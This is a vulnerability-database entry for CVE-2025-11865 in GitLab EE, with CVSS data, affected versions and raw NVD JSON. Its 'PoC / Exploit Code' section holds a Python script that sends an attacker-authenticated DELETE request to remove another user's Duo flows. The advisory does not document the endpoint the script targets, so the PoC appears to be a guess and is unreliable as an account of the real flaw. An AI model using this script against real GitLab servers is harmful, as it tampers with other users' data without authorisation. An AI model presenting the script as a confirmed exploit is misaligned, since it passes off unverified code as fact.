Security Vulnerability Report
CVE-2025-11865 CVSS 4.3 MEDIUM

Published: 2025-11-15 08:15:44
Last Modified: 2025-11-19 17:59:18

Description

An issue has been discovered in GitLab EE affecting all versions from 18.1 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that, under certain circumstances, could have allowed an attacker to remove Duo flows of another user.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE - GitLab EE from 18.1 up to (excluding) 18.3.6
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE - GitLab EE from 18.4 up to (excluding) 18.4.4
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE - GitLab EE from 18.5 up to (excluding) 18.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11865 PoC - GitLab EE Unauthorized Duo Flows Removal
# This PoC demonstrates the access control bypass vulnerability

import requests
import json

TARGET_GITLAB_URL = "https://gitlab.example.com"
ATTACKER_TOKEN = "glpat-attacker-token-here"
TARGET_USER_ID = "victim-user-id"


def delete_duo_flows():
    """
    Exploit the CVE-2025-11865 vulnerability to remove another user's Duo flows
    """
    headers = {
        "PRIVATE-TOKEN": ATTACKER_TOKEN,
        "Content-Type": "application/json"
    }

    # Target endpoint for Duo flows deletion
    endpoint = f"{TARGET_GITLAB_URL}/api/v4/users/{TARGET_USER_ID}/duo_flows"

    try:
        # Send DELETE request - this should fail with proper auth check
        response = requests.delete(endpoint, headers=headers, timeout=10)

        if response.status_code == 204 or response.status_code == 200:
            print("[+] SUCCESS: Target user's Duo flows removed!")
            print(f"[+] Response: {response.text}")
            return True
        else:
            print(f"[-] FAILED: Status code {response.status_code}")
            print(f"[-] Response: {response.text}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] ERROR: {str(e)}")
        return False


if __name__ == "__main__":
    print("CVE-2025-11865 PoC - GitLab EE Unauthorized Duo Flows Removal")
    print("=" * 70)
    delete_duo_flows()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11865", "sourceIdentifier": "[email protected]", "published": "2025-11-15T08:15:43.547", "lastModified": "2025-11-19T17:59:17.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue has been discovered in GitLab EE affecting all versions from 18.1 before 18.3.6, 18.4 before 18.4.4, and 18.5 before 18.5.2 that, under certain circumstances, could have allowed an attacker to remove Duo flows of another user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.1.0", "versionEndExcluding": "18.3.6", "matchCriteriaId": "0AC48ED5-5EF8-477F-A9F9-E08BE928EC6A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.4.0", "versionEndExcluding": 
"18.4.4", "matchCriteriaId": "6D0A238D-1278-4D05-86F5-4C323E0CFE36"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.5.0", "versionEndExcluding": "18.5.2", "matchCriteriaId": "B2A3A57F-C750-4C92-8C2B-C5FCF1D70F4F"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2025/11/12/patch-release-gitlab-18-5-2-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/issues/561399", "source": "[email protected]", "tags": ["Broken Link"]}]}}